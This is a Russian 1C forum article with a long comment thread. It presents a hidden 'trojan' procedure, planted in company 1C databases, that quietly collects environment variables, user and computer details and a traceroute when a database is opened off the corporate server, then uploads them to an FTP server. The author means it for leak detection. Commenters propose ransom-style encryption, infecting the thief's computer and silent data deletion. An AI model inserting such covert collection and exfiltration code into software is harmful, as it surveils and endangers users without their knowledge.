Информирование об утечке базы 1С

03.03.18

Администрирование - Информационная безопасность

Когда работаешь в крупном холдинге, количество сотрудников, имеющих доступ к базам 1С неизменно растет. Рано или поздно появится задача по контролю утечки баз 1С. Конечно мы применим все меры по предотвращению утечки баз, но и информирование о случаях утечки тоже не повредит.

Идея "собирать статистику" сама по себе не нова, вот и я решил аналогичным способом реализовать ее, «заразив» все свои базы 1С процедурой «ПроверитьМестоЗапуска1С()»

Вызов этой процедуры можно спрятать куда угодно, хоть в одно из часто выполняемых Регламентных заданий, хоть среди других таких процедур в общем модуле центра мониторинга. Конечно выбрать нужно место такое, которое как можно реже обновляется. Я банально вызываю ее из процедур «ПриНачалеРаботыСистемы()» в модуле приложения (управляемого/обычного).

Смысл идеи моего «трояна» заключалась в том, что если 1С запущена на компьютере с названием, отличным от названия нашего RDP сервера, то 1С сформирует файл со сведениями из окружения запуска и передает его на наш дежурный FTP сервер. Кстати способов передать файл с данными множество, я использовал FTP, поскольку у меня уже был поднят FTP сервер, хотя можно использовать и HTTPсоединение.

Поскольку в коде в открытом виде будет написан пароль для FTP соединения, создаем изолированную папку FTP для этого пользователя и создаем авто перенос уже переданных на FTP файлов в недоступное место. Это уже задача для системного администратора.

И так сама процедура:

Процедура ПроверитьМестоЗапуска1С()
   // Вся процедура выполняется только, если 1С запущена не на «вашем» сервере.
   // Конечно, можно использовать другие признаки опознавания работы с базой 1С не внутри вашей сети. 
    Если ИмяКомпьютера()<>"Name_YOU_Server_RDP" Тогда

	ИмяВременногоФайла = ПолучитьИмяВременногоФайла("txt");
	Текст =  Новый ТекстовыйДокумент;
	//Сведения из окружения 1С, их сбор происходит незаметно для пользователя.
	Текст.ДобавитьСтроку(ПолучитьЗаголовокСистемы());
	Текст.ДобавитьСтроку(ИмяКомпьютера());
	Текст.ДобавитьСтроку(ИмяПользователя());
	Текст.ДобавитьСтроку(ПолноеИмяПользователя());
	Текст.ДобавитьСтроку(КаталогВременныхФайлов());
	Текст.ДобавитьСтроку(СтрокаСоединенияИнформационнойБазы());
	Текст.ДобавитьСтроку(ФОРМАТ(ТекущаяДата(),"ДЛФ=DT"));
	Текст.Записать(ИмяВременногоФайла, КодировкаТекста.OEM);
	Текст=Неопределено;

	//Эти сведения собираются с использованием командной строки, их сбор происходит с появлением черного окошка командной строки на 4 секунды.
	КомандаСистемы("set >> "+ИмяВременногоФайла);  //Переменные окружения иногда могут многое сказать о владельце компьютера
	КомандаСистемы("tracert -d -h 3 -w 1000 -4 ya.ru >> "+ИмяВременногоФайла);  //Это самая долгая операция, но зато позволяет узнать внешний IP адрес места, где запустили нашу 1С.

	//Передаем сведения по FTP
	АдресСайта = "You_Ftp_server.ru" ;
	Порт = 21;
	Логин = " YouFTPUser";
	Пароль = " YouFTPPassword";
	ИмяКаталога = "/";
	FTPСоединение = Новый FTPСоединение(АдресСайта,Порт,Логин,Пароль,,Истина,5);
	FTPСоединение.УстановитьТекущийКаталог(ИмяКаталога);
	FTPСоединение.Записать(ИмяВременногоФайла,ИмяКомпьютера()+"_"+ФОРМАТ(ТекущаяДата(),"ДФ=yyyyMMdd")+".txt");
	FTPСоединение=Неопределено;

    КонецЕсли;
	
КонецПроцедуры

Ну вот и готов еще один способ информирования об утечки информации.

FTP утечка CMD Троян

+27 –

См. также

AUTO VPN (portable) - автоматический ВПН

Информационная безопасность Системный администратор Программист Платные (руб)

AUTO VPN (portable) - автоматизация подключения пользователей к удаленному рабочему месту или сети посредством создания автоматического VPN (L2TP или L2TP/IPSEC и т.д.) подключения без ввода настроек пользователем (с возможностью скрытия этих настроек от пользователя). Программа автоматически выполняет подключение к VPN серверу и после успешного коннекта , если необходимо, подключение к серверу удаленных рабочих столов (RDP).

1200 руб.

24.03.2020 15364 25 32

Работа с бинарными файлами, форматом ASN1 и криптографией в 1С8

Информационная безопасность Программист Платформа 1С v8.3 Конфигурации 1cv8 Россия Платные (руб)

Предлагается внешняя обработка для просмотра данных в формате ASN1. Есть 2 режима: загрузка из бинарного формата и из BASE64. Реализована функция извлечения всех сертификатов, которые можно найти в ASN1-файле. В дополнении к этому продукту предлагается методическая помощь по вопросам, связанным с технической реализацией криптографии и шифрования в 1С.

2400 руб.

29.08.2016 30053 9 1

Хранение секретов в Hashicorp Vault для 1С

Информационная безопасность Пароли Платформа 1С v8.3 Бесплатно (free)

Все еще храните пароли в базе? Тогда мы идем к вам! Безопасное и надежное хранение секретов. JWT авторизация. Удобный интерфейс. Демо конфигурация. Бесплатно.

30.05.2024 6209 kamisov 17

Настройка аутентификации в 1С с использованием стандарта RFC 7519 (JWT)

Информационная безопасность Программист Платформа 1С v8.3 Бесплатно (free)

Рассмотрим в статье более подробную и последовательную настройку аутентификации в 1С с использованием распространенной технологии JWT, которая пришла в программу в платформе версии 8.3.21.1302.

27.02.2024 7313 PROSTO-1C 10

Device flow аутентификация, или туда и обратно

Информационная безопасность Программист Платформа 1С v8.3 Абонемент ($m)

Интеграционные решения стали неотъемлемой частью нашей жизни. Правилом хорошего тона в современных приложениях является не давать интегратору доступ к чувствительным данным. Device flow позволяет аутентифицировать пользователя, не показывая приложению чувствительные данные (например: логин и пароль)<br> Рассмотрим Device flow аутентификацию, в приложении, на примере OpenID провайдера Yandex.

1 стартмани

27.10.2023 2409 platonov.e 1

Установка 1С:Сервера взаимодействия. Заметки на полях

Информационная безопасность Системный администратор Программист Платформа 1С v8.3 Конфигурации 1cv8 Бесплатно (free)

Нюансы установки 1С:Сервера взаимодействия в рабочем контуре

11.10.2023 4638 capitan 9

Анализатор безопасности базы сервера 1С

Информационная безопасность Системный администратор Платформа 1С v8.3 Конфигурации 1cv8 Россия Абонемент ($m)

Продукты на основе решений 1С уверенной поступью захватывают рынок учётных систем в стране. Широкое распространение программ всегда порождает большой интерес к ним со стороны злоумышленников, а пользователь 1С это одна из дверей в защищённый информационный контур предприятия. Обработка позволяет быстро и комплексно оценить настройки безопасности конкретной базы и возможности пользователя этой базы на сервере. Также можно оценить некоторые аспекты сетевой безопасности предприятия со стороны сервера 1С.

5 стартмани

24.04.2023 6252 20 soulner 8

Двухфакторная аутентификация в 1С через Telegram и Email

Информационная безопасность Системный администратор Программист Платформа 1С v8.3 1С:ERP Управление предприятием 2 Абонемент ($m)

1С, начиная с версии платформы 8.3.21, добавили в систему возможность двойной аутентификации. Как это работает: в пользователе информационной базы появилось свойство «Аутентификация токеном доступа» (АутентификацияТокеномДоступа во встроенном языке), если установить этот признак и осуществить ряд манипуляций на встроенном языке, то появляется возможность при аутентификации отправлять HTTP запросы, которые и реализуют этот самый второй фактор. Данное расширение позволяет организовать двухфакторную аутентификацию с помощью электронной почты или мессенджера Telegram.

2 стартмани

08.12.2022 7278 50 Silenser 12

Комментарии

Подписаться на ответы Инфостарт бот

Свернуть все

1. genayo 03.03.18 17:38 Сейчас в теме

И скольких уже поймали?

Ответить

2. Armando 1401 03.03.18 23:15 Сейчас в теме

У вас реально есть толпа народа, кто имеет доступ к серверу БД и резервным копиям?

10. dima_home 253 05.03.18 07:46 Сейчас в теме

Для умников (2), (3).
Базы бывают не только клиент-серверные, но и файловые, а для них ненужно никаких прав для копирования.

11. genayo 05.03.18 07:50 Сейчас в теме

(10) Если программисту 1С приходится заботиться об утечках баз - что-то явно не так в вашем холдинге...

12. TODD22 19 05.03.18 07:51 Сейчас в теме

(11)А кто должен?

13. genayo 05.03.18 07:54 Сейчас в теме

(12) Служба информационной безопасности (или сисадмины, на которых глупые начальники повесили эту функцию), кто ж еще.

19. TODD22 19 05.03.18 08:09 Сейчас в теме

(13)

на которых глупые начальники

Кругом дураки, один Геннадий умный.

Служба информационной безопасности

Так может он как раз и есть сотрудник этой самой службы? Либо на него возложены обязанности этой самой службой.

22. genayo 05.03.18 08:20 Сейчас в теме

(19) Вы не согласны, что служба информационной безопасности и сисадмины должны быть отдельными службами? И что совмещать их вместе глупость?

23. TODD22 19 05.03.18 08:28 Сейчас в теме

(22)

что служба информационной безопасности и сисадмины должны быть отдельными службами?

А при чём тут я? Каждое предприятие для себя само определяет кто и за что у них отвечает.

"Сисадмины" понятие довольно растяжимое. СБшники например могут возложить эти обязанности на одного, старшего(главного) сисадмина.

И что совмещать их вместе глупость?

Вам наверное как имеющему большой опыт работы с СБ виднее.

24. genayo 05.03.18 08:31 Сейчас в теме

(23) Везде, где всерьез озабочены информационной безопасностью, это разные службы.

72. dima_home 253 11.03.18 10:09 Сейчас в теме

(23)Как правило работники в службе безопасности это бывшие сотрудники органов власти, и с компьютерами они не всегда дружат - идут за советом в службу ИТ.

14. dima_home 253 05.03.18 07:56 Сейчас в теме

(11) А кто сказал что я просто программист 1С.

В статье сказано "Конечно мы применим все меры по предотвращению утечки баз, но и информирование о случаях утечки тоже не повредит".
Т.е. это дополнительная мера по контролю. Также как дополнительное мерой являет ежедневный мониторинг неправильно набранных паролей при авторизации.
Просто ИНФОСТАРТ - это 1С сообщество, тут публикуются примеры в 1С.

Моя статья была изначально немного больше, но меня попросили ее сократить, так как это может навредить 1С.

18. genayo 05.03.18 08:07 Сейчас в теме

(14)А, ну если ты программист 1С, ответственный за инфобезопасность - тогда ладно :))

42. AlexO 135 06.03.18 12:56 Сейчас в теме

(14)

но меня попросили ее сократить, так как это может навредить 1С

Чем, тем, что встраивается код-шпион? )

58. 1cccc 09.03.18 16:57 Сейчас в теме

(14) Тоже интересно, что такого опасного для 1с вы сделали.

73. dima_home 253 11.03.18 10:11 Сейчас в теме

(58) Читайте между строк... и комментарии мои, если их не удалят (например 20, 25).

3. Константин С. 675 03.03.18 23:28 Сейчас в теме

Да еще с полными правами?
Да еще не знает что в базе прописан этот код.

15. dima_home 253 05.03.18 07:59 Сейчас в теме

(3)

Да еще не знает что в базе прописан этот код.

У себя в холдинге я прописывал лично, не уведомляя всех программистов 1С, а только старшего, отвечающего за обновления.

Но эта нацелено не против программистов 1С, а например системных администраторов, которые не вкурсе о кодах 1С но могут скопировать на сторону бакап (например).

34. user928779 06.03.18 09:48 Сейчас в теме

(15) Системные администраторы, да и просто вменямые люди, запустят скопированный на сторону бэкап не в сети вашего "холдинга", а в изолированной среде. Ну, чтобы та же платформа в интернет не лезла.
В результате ваше поделие не найдет ваш фтп и будет плакать.

60. 1cccc 09.03.18 17:00 Сейчас в теме

(34) 90% злоумышленников не такие умные и об этом и не подумают, так что подход довольно эффективный.

74. dima_home 253 11.03.18 10:13 Сейчас в теме

(60) я бы поправил до 99%

4. whitedi 21 04.03.18 04:05 Сейчас в теме

IP = "";
	MACAddress = Неопределено;
	ИПАдрес = "";
	Попытка
		ServicesSet = ПолучитьCOMОбъект("winmgmts:\\localhost\root\cimv2");
	Исключение
		Возврат IP;
	КонецПопытки;
	MyItems = ServicesSet.ExecQuery("Sel ect * Fr om Win32_NetworkAdapterConfiguration Where IPEnabled = True");
	Для Каждого MyItem Из MyItems Цикл
		MACAddress = MyItem.MACAddress;
		Если ЗначениеЗаполнено(MACAddress) Тогда
			IPAddress = Неопределено;
			Для Каждого IPAddress Из MyItem.IPAddress Цикл
				Если ЗначениеЗаполнено(IPAddress) Тогда
					IP = IPAddress;
					прервать;
				КонецЕсли;
			КонецЦикла;
		КонецЕсли;
	КонецЦикла;
	Возврат IP;

Показать

скрой черное окошко, не нервируй пользователей

16. dima_home 253 05.03.18 08:04 Сейчас в теме

(4)

скрой черное окошко, не нервируй пользователей

А смысл. База должна открываться только на сервере... и соответственно никаких окошек не будет.
А если кто залетный первый раз запустит копию дома (например), если окошко появилось, уже поздно что то предпринимать, сведения будут отправлены.

Кроме того не стояла задача с постоянной слежкой, а только контроль за утечкой.

5. Xershi 1555 04.03.18 09:28 Сейчас в теме

И что это даст когда уволенный сотрудник запустит у себя базу?
Будете только ловить спам у себя на сервере и локти кусать!
Хотя до смены пароля на фтп, тогда кто раньше стянул и позже запустил будет молодцом!

17. dima_home 253 05.03.18 08:06 Сейчас в теме

(5) Сам то понял что написал?

29. Xershi 1555 05.03.18 09:56 Сейчас в теме

(17) а вы я так понял нет?

6. azubar 48 04.03.18 09:30 Сейчас в теме

Гораздо проще слить информацию через вывод списков, экспорт в xml/excel/csv.
Для отправки собранных данных лучше использовать http (менее палевно и пароли не нужны), небольшой скрипт на php/nodejs либо через веб апи сразу в телеграм себе кидать алерт.

Ответить

20. dima_home 253 05.03.18 08:16 Сейчас в теме

(6)

собранных данных лучше использовать http

Конечно лучше. Просто у нас есть поднятый FTP сервер и нет HTTP. Вот и использовали FTP.

Кстати, 1С во все новые конфигурации вставляет код по передачи сведений (статистики) как раз через HTTP.

43. AlexO 135 06.03.18 12:58 Сейчас в теме

(20)

как раз через HTTP.

Для них так проще )

7. SergeyDityatev 2 04.03.18 11:10 Сейчас в теме

)))
Ну надо тогда по полной резвиться, раз троян в базе 1С. Шифруешь файлы компьютера злоумышленника и требуешь возврат базы на родину с компенсацией ущерба.

9. Armando 1401 04.03.18 14:01 Сейчас в теме

(7) потом окажется что это был товарищ майор из ОБЭП... Вот в управлении К обрадуются такому повороту)

31. m-rv 972 05.03.18 11:50 Сейчас в теме

(9) интересная мысль, потом еще окажется что таким способом автор получил неправомерный доступ к информации защищаемой законом (напр. фамилия оперативника).
а вообще - троян внутри базы - это ок.

21. dima_home 253 05.03.18 08:19 Сейчас в теме

(7)

Ну надо тогда по полной резвиться, раз троян в базе 1С.

Что ж у вас мозги то повернуты в сторону украсть или вымогать?

8. RailMen 826 04.03.18 11:26 Сейчас в теме

Лучше информировать о запуске базы в телеграмм чат.

25. dima_home 253 05.03.18 08:44 Сейчас в теме

Чтобы сократить холивар сообщу:
1. Пример в статье не предназначен для внедрения троянов в 1С, а нужен для разового выполнения вне нашего сервера. Отсюда и упрощенный подход.
2. Пример в статье не является панацеей от утечки, это просто еще один сигнал о событии.
3. Аналогичной схемой пользуется компания 1С, только с использованием HTTP. Именно по-этому, мы у себя в файле hosts добавили строки:
127.0.0.1 pult.1c.ru #send 1C statistic
127.0.0.1 pult.1c.eu #send 1C statistic
Для тех кто не в курсе... поищите "pult.1c" в конфигурации 1С (ERP2,КА2,БУХ3).
4. Аналогично решается и для 1с 7.7.
5. Конечно решение предназначено больше для легко копируемых файловых баз.
6. За историю холдинга накапливается не один десяток баз и их копий + ротация кадров = лишняя помощь в контроле за утечной не помешает.

26. genayo 05.03.18 08:50 Сейчас в теме

(25) Решение с технической точки зрения вопросов не вызывает, и все-же, сколько раз сработало и помогло кого-либо поймать?

27. ipoloskov 164 05.03.18 08:59 Сейчас в теме

(26) Велосипедный шлем спасает жизнь один раз. Но этого достаточно.

28. dima_home 253 05.03.18 09:23 Сейчас в теме

(26)

сколько раз сработало и помогло кого-л

Пока только программиста 1С, который зачем то решил скопировать копию базы для разработчиков с RDP на локальный компьютер. Хотя почему "зачем то", для конкретных целей - тестирования нового драйвера ККМ.

На этом поняли, что способ информирования рабочий.

Утечек во внешнюю среду пока не наблюдали.

35. user928779 06.03.18 09:54 Сейчас в теме

(25)

мы у себя в файле hosts добавили строки:
127.0.0.1 pult.1c.ru #send 1C statistic
127.0.0.1 pult.1c.eu #send 1C statistic

Каждому пользователю? Корпорация!

45. dima_home 253 07.03.18 11:05 Сейчас в теме

(35) Нет. Только на серверах RDP и на сервере 1С.

80. vat-74 167 19.02.20 11:23 Сейчас в теме

(25)

127.0.0.1 pult.1c.ru #send 1C statistic
127.0.0.1 pult.1c.eu #send 1C statistic

127.0.0.1 pult.1c.com #send 1C statistic
еще забыли

30. ice-net 19 05.03.18 10:09 Сейчас в теме

(0)Обычно люди, ворующие базы данных не новички) Прежде чем запускать, можно через конфигуратор и отключить бы все регламентные и фоновые задания, закомментить все обращения в веб или запустить на виртуалке без интернета.
В целом хотел сказать, что смысла в этом почти никакого нет. Ну узнаете вы в лучшем случае ip/имя компа и время открытия, если пароль на фтп не измените, и все.. Если хотите жестко наказать - форматируйте/заражайте вирусами компьютер вора, или удаляйте мелкими порциями данные из базы. Да, так даже лучше, открыл он предприятие - начали удаляться контрагенты в фоне, договора, организации, затем документы и тд.. в общем смысла больше, чем собирать статистику кто сколько раз открыл ворованную базу

32. catena 110 06.03.18 08:30 Сейчас в теме

(30)Ну да, ну да. А потом админы, которые не в курсе, по какой-либо причине устраивают переезд баз на новый сервак.

36. ice-net 19 06.03.18 11:00 Сейчас в теме

(32) Мое предложение - исключительно как средство защиты от воровства данных. Как не подорваться самим и использовать ли его - решать каждому для себя отдельно.

37. catena 110 06.03.18 11:02 Сейчас в теме

(36)Это я не к вашей статье, а к предложению вредительствовать с данными.

39. ice-net 19 06.03.18 11:09 Сейчас в теме

(37) Статья не моя) Вредительство с данными мне кажется отличной идеей, при правильной реализации) Хотя, согласен, это не решит проблему, а лишь немного усложнит ворам задачу. Не зря же придумали способы удаленного уничтожения данных.

40. catena 110 06.03.18 11:11 Сейчас в теме

(39)Пардон, скорострельность ответов такая, что все смешалось)
Меры предосторожности не должны даже в теории вредить боевым данным. Иначе это уже не борьба со злоумышленниками, а саботаж.

41. ice-net 19 06.03.18 11:15 Сейчас в теме

(40)

Меры предосторожности не должны даже в теории вредить боевым данным

Это как раз не мера предосторожности, а скорее попытка прямой защиты данных от кражи.

33. dima_home 253 06.03.18 09:31 Сейчас в теме

(30) Как вы читаете статьи извращенно?!? Это не средство защиты баз!
Это дополнительный способ информирования для случаев, когда базы могут быть легко скопированы сотрудниками, у которых имеется доступ к базам в виду должностных обязанностей.

Я сам сталкивался не однократно, когда главные бухгалтера притаскивали на работу копию какой либо чужой базы 1С ... так сказать, чтобы наши 1С специалисты помогли решить возникшие проблемы у их знакомых. А кто сказал, что тот же главбух не скопирует какую либо базу себе домой, чтобы поработать дома.

В каждой крупной компании есть основные базы, они как правила клиент серверные и второстепенные(одноразовые/редкозапускаемые) базы, которые как правило файловые. Например в нашей корпорации на сегодня одновременно работают более 20 баз 1С, и только 4 основных (клиент-серверных).

38. ice-net 19 06.03.18 11:02 Сейчас в теме

(33) Не обижайтесь, ничего личного, я просто не понимаю смысла в ценности этой информации)

Я сам сталкивался не однократно, когда главные бухгалтера притаскивали на работу копию какой либо чужой базы 1С ... так сказать, чтобы наши 1С специалисты помогли решить возникшие проблемы у их знакомых. А кто сказал, что тот же главбух не скопирует какую либо базу себе домой, чтобы поработать дома.

В каждой крупной компании есть основные базы, они как правила клиент серверные и второстепенные(одноразовые/редкозапускаемые) базы, которые как правило файловые. Например в нашей корпорации на сегодня одновременно работают более 20 баз 1С, и только 4 основных (клиент-серверных).

Не встречал таких компаний. Не отрицаю, может они и есть, но это не значит - что так и надо. При наличии сервера 1с необходимость в файловых БД на сервере отпадает напрочь! Нужна возможность работать глбух дома - сделайте РДП подключение. Если база нужна только одной бухгалтерше - опять же, сделайте ей рдп. Если так случилось, что у глбух нет дома интернета и она одна работает с этой базой, ну купите ей внешний диск и туда поставьте, что бы она не копировала ДТшки или 1СД файлы..

ПС.
И подведя итог:

Это дополнительный способ информирования для случаев, когда базы могут быть легко скопированы сотрудниками, у которых имеется доступ к базам в виду должностных обязанностей.

Для чего? Раз доступ имеется - значит база может быть скопирована и отдана кому угодно. Какую задачу это решает? Получить статистику сколько раз ваша база открыта на каких ПК отличных от сервера? Вот узнали Вы, что база открыта 481 раз на 10 ПК, доступ к этой базе есть у 3 человек. Что это решает? Кто-то сливает базы? Или у этих людей по 3 ПК? или кто-то один отнес "соседским" программистам, что бы те помогли ей решить какую-то задачу? Что-то надо делать или все ок?

47. AlexO 135 07.03.18 11:28 Сейчас в теме

(38) ну нужно что-то делать, вот сделали - вроде как мера, вроде как, предосторожности ))
Особо-то не разгонишься, с такими-то средствами... )

44. dima_home 253 07.03.18 10:59 Сейчас в теме

<quote>При наличии сервера 1с необходимость в файловых БД на сервере отпадает напрочь</quote>
У каждой компании имеется история, а у крупных компаний эта история начинается с 1С 6.0. Так что не всегда все базы 1С можно затащить на в клиент серверный вариант с последнем релизом 1С 8.3. / 8.2 (разведенного по портам). Да и не все внешние компоненты управления оборудованием работают с последними движками. Но я полностью с вами согласен, стремиться в этом направлении нужно. Однако бывают ситуации, когда такой подход прямо противопоказан.

<quote>сделайте РДП подключение сотрудникам из дома</quote>
С ростом компании приходит понимание, что работа сотрудников из дома это больше вред, чем благо. Конечно, если ваш бизнес заранее не заточен на обратное. Ну и со временем придёт понимание в необходимости контроля за внешними носителями.

<quote>И подведя итог</quote>
Каждый делает выводы по своему. У меня итог другой.
Я не собираю статистику, мне важен только сам факт "первого" случая, чтобы заняться им (выявить как это произошло, зачем это сделано, сделать соответствующие выводы). За выявлением такого случая настроен zabbix, ин и следит за папкой FTP.

46. genayo 07.03.18 11:16 Сейчас в теме

(44)

С ростом компании приходит понимание, что работа сотрудников из дома это больше вред, чем благо

Можете пояснить, почему считаете, что это так? Или у вас круглосуточная техподдержка по всем бизнес-процессам?

49. AlexO 135 07.03.18 11:32 Сейчас в теме

(46) "с точки зрения безопасности" же, и тогда все встает на свои места )

48. AlexO 135 07.03.18 11:31 Сейчас в теме

(44)

что работа сотрудников из дома это больше вред, чем благо

У вас что - "один сотрудник - одна база"?

Я не собираю статистику, мне важен только сам факт

о том и речь - вы делаете "хоть что-то, что можно" )
Меня вот другой вопрос интересует - как у вас при таком зоопарке баз с актуальностью данных?

51. ice-net 19 07.03.18 13:47 Сейчас в теме

(48)

"хоть что-то, что можно"

Работа ради работы?)

52. AlexO 135 08.03.18 09:26 Сейчас в теме

(51)так если ничего другого нельзя сделать )
Ну вот нашли такой "способ" следить )

54. dima_home 253 09.03.18 12:44 Сейчас в теме

(51)ох не давите на больной мозоль))

50. ice-net 19 07.03.18 13:31 Сейчас в теме

(44)
Много знаете компаний, которые сейчас ведут учет на 6.0, да еще и таскают себе домой для работы?
Случаи бывают всякие, но я абсолютно точно не представляю, как работая (не монопольно) с базой потом объединить данные, вы представляете какой это геморрой? а если 1 сотрудник - 1 база, ну и смысл тогда в оповещении?

С ростом компании приходит понимание, что работа сотрудников из дома это больше вред, чем благо. Конечно, если ваш бизнес заранее не заточен на обратное. Ну и со временем придёт понимание в необходимости контроля за внешними носителями.

Работа из дома ничем не отличается от работы в офисе, если цель этой работы именно работа, а не воровство данных.

Я не собираю статистику, мне важен только сам факт "первого" случая, чтобы заняться им (выявить как это произошло, зачем это сделано, сделать соответствующие выводы). За выявлением такого случая настроен zabbix, и он и следит за папкой FTP.

Вы разрешили человеку копировать базу. Даже, возможно, показали как это делать. Как это произошло? (Вы разрешили). - Зачем это сделано? (А зачем Вы разрешили это делать? Что бы потом спрашивать зачем скопировал?)
И какие Выводы? Отключите проверку для этой базы или в исключения добавите? А если человек работает на 7 компах, или на ноуте в разных сетях.. или на самом деле он врет и слил базу конкурентам?

53. user928779 08.03.18 13:14 Сейчас в теме

(50)

Много знаете компаний, которые сейчас ведут учет на 6.0

Ну, у человека такое вот представление об Очень Крутых Крупных Корпорациях. Того же уровня, что и настройка сети при помощи файлов hosts.
Не разламывай ему картину мироустройства, пусть уж сам.

76. dima_home 253 11.03.18 11:07 Сейчас в теме

(53)

у, у человека такое вот представление об Очень Крутых Крупных Корпорациях

Про 6.0 читай пост 75, чтоб не повторятся.
Про host читай пост 73. Вы даже не поняли, на что я намекал.
Управлять конечно возможно и через MikroTik, суть сообщения в другом... в том, какую сроку искать в кодах 1С.
Надеюсь этот пост также не удалят.

75. dima_home 253 11.03.18 10:57 Сейчас в теме

(50)

Много знаете компаний, которые сейчас ведут учет на 6.0

Ведут учет - нет, а вод иметь доступ к базе для просмотра истории движения МПЗ или иных данных - много, если ваша организация существует с 2000 годов.

Работа из дома ничем не отличается от работы в офисе

ОЧЕНЬ отличается. Начнем с того, что семья постоянно тебя отвлекает (если конечно семья у вас на первом месте). Закончим тем, что невозможно эффективно работать с бумажными документами, отсутствие местной связи (не всегда). Любая отдаленность приводит к разрозненности сотрудников, уменьшается взаимопомощь (это особенно наглядно видно, когда часть сотрудников работают удаленно в других городах - тут и разница во времени, и отношение к ним как к чужим, обслуживаются в последнюю очередь).

Вы разрешили человеку копировать базу.

Я не разрешал копировать базу. Просто сотрудник работает с файловой версией, и ВОЗМОЖНО знает, что ее можно просто скопировать используя contorl+c и control+v на папочке с 1С. Количество сотрудников, умеющих копировать папки, значительно превосходит количество сотрудников, умеющих программировать 1С. На эту ситуацию и направленна прежде всего статья.

77. ice-net 19 11.03.18 11:55 Сейчас в теме

(75)

Эта информация полезна разве что аналитикам, руководству... и, обычно, очень редко.

При чем тут это? Если берете работу домой - работайте, если не можете (семья мешает, связи нет, бумажек нет, прочее) - не берите ее домой или учитесь не смешивать личное с работой дома. Все просто.

Кстати, Remoteapp говорит Вам о чем-нибудь? Разве что лишний ПК/сервер нужен..

78. dima_home 253 13.03.18 19:52 Сейчас в теме

(77)

Кстати, Remoteapp говорит Вам о чем-нибудь?

К сожалению, лично у меня, опыт по применению Remoteapp в части 1С был в основном отрицателен. Чего стоит только постоянные "залипания" приложений при потере связи. Бесконечные запуски "Килл процесс"/"отключения сеанса" - это спутник применения Remoteapp.
Не у одних у нас эти проблемы: "Застревание" сеансов терминала.
А необходимость удаленной работы с документами в хранилище в нашем случае перевесило на использование простого RDP.
Случайно пропустил ваш пост, извините.

55. Stim213 416 09.03.18 12:56 Сейчас в теме

Неплохо было бы придумать "ответ" от фтп, по которому определять - получать ли ответ от такой базы или нет.
А то получится, что главбух совершенно законно заберет копию базы к себе домой и будет вас спамить ежедневными сообщениями

56. user928779 09.03.18 13:09 Сейчас в теме

(55) А если не главбух? (:

Впрочем, согласен. Нужна следующая версия с кодом:

Если Не Пользователь.Наименование <> "Иван Иванович" Тогда Иначе
...
КонецЕсли;

И обязательно прописать в холдинге лично, не уведомляя всех программистов 1С, а только старшего, отвечающего за обновления.

57. Stim213 416 09.03.18 16:14 Сейчас в теме

(56) нет. Ответ нужен по имени компа.
Сначала комп шлёт свое имя и спрашивает - а нужен ли я вам?
А ему в ответ - извини, дорогой, мы уже поняли кто ты и ты нам не нужен.
Или - мы тебя не знаем! Иди сюда

63. user928779 09.03.18 19:57 Сейчас в теме

(57) Вот сразу видно опытного 1Сника, понимающего основы клиент-серверного взаимодействия!

Не надо никаких протоколов изобретать. Надо просто имя компьютера передавать всегда, а на сервере его тупо выбрасывать. Минус один серверный вызов в вашей терминологии. Полная изоляция логики обработки на сервере...

Хотя что это я. Для Холдинга - самое то.

64. Stim213 416 10.03.18 07:00 Сейчас в теме

(63) лучше - отправкой управлять через константу. Пусть она будет неявная, хранить в себе хранилище значений со структурой, ~~зайцем в утке~~ в которой булево - отправлять данные или нет.

Вот это будет более менее нормальное решение.
не спамить сервер постоянно "нужен я или нет", а получив раз ответ "не нужен" - выключить константу и больше сервер не мучать.

68. user928779 10.03.18 10:06 Сейчас в теме

(64) Хорошая идея. Можно уложиться в один вызов сервера, если использовать вместо ftp протокол, умеющий формировать нужный ответ. Еще один плюс в сторону http

59. user869680 09.03.18 16:59 Сейчас в теме

Как можно сделать защиту данных от копирования?

61. 1cccc 09.03.18 17:15 Сейчас в теме

(59) Никак. Скриншотить вы не сможете запретить (это самый простой метод). Особенно, если пользователь работает из дома.

62. genayo 09.03.18 17:17 Сейчас в теме

(61) А не из дома - экран монитора сфотографирует на смартфон....

69. user928779 10.03.18 10:08 Сейчас в теме

(62) Отобрать телефоны! Отобрать бумагу и ручки! Отрубить руки, выколоть глаза и отрезать язык.
Заодно, предприятие получит налоговые льготы за трудоустройство инвалидов - сплошной профит!

71. dima_home 253 11.03.18 10:05 Сейчас в теме

(59)

к можно сделать защиту данных от

61 прав. От скриншотов не защититься.

Если сотрудник работает с файловой базой, скорей всего никак, поскольку он для работы должен иметь доступ к файлу БД.
В этом случаи нужно защищаться от любого копирования файла с RDP - блокировать подключение дисков/флэшек, запретить буфер обмена, интернет, почту, доступ к "шара" по сети. Все это создает страшное неудобство в работе.

65. Stim213 416 10.03.18 07:02 Сейчас в теме

+ а вообще, любая типовая 1С база - это дыра дырой, хоть даже и на сервере.
я уже писал об этом : https://infostart.ru/public/182849/

66. CSiER 36 10.03.18 09:07 Сейчас в теме

Какой регламент в случае обнаружения утечки базы (например, если базу открыли с домашнего компа)?

67. user928779 10.03.18 10:00 Сейчас в теме

(66) Исполняющие роли безопасников посыпают голову пеплом исполняющих роль 1Сников. Пожалуй, всё.
А, ещё на противопожарном инструктаже рассказывают про эту успешную операцию.

70. dima_home 253 11.03.18 09:54 Сейчас в теме

(66) Сначала самостоятельно анализирую, не ложное ли это срабатывание.
Потом выявляю кто это. Тут нюансы, для старых баз скорей всего зайдут под своим именем , а для новых баз, где доменная авторизация, пользователь скорей всего будет сброшен. Ну и надо ответить на вопрос, с какого места была запущена база (анализ IP и окружения).

Доводим до сведений вышестоящего руководителя и передаем эти сведения службе безопасности. Руководитель уже решает: ограничится личным внушением или довести до увольнения.

79. vis_tmp 32 16.03.18 07:44 Сейчас в теме

Поправьте "И так" -> "Итак, "

81. dima_home 253 07.05.20 20:55 Сейчас в теме

Добавлю перехваченный недавний случай... приглашенный программист "слил" себе на компьютер копию.
Сразу оговорюсь... это не у нас, а у одного из партнеров.

BSR / Admin /  Управление производственным предприятием, редакция 1.3 / 
Admin-ПК
Admin
Admin
C:\Users\Admin\AppData\Local\Temp\
Srvr="server1ckompl:1641";Ref="UPP";
07.04.2020 8:58:43
============================
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\Admin\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=ADMIN-ПК
ComSpec=C:\Windows\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Users\Admin
LOCALAPPDATA=C:\Users\Admin\AppData\Local
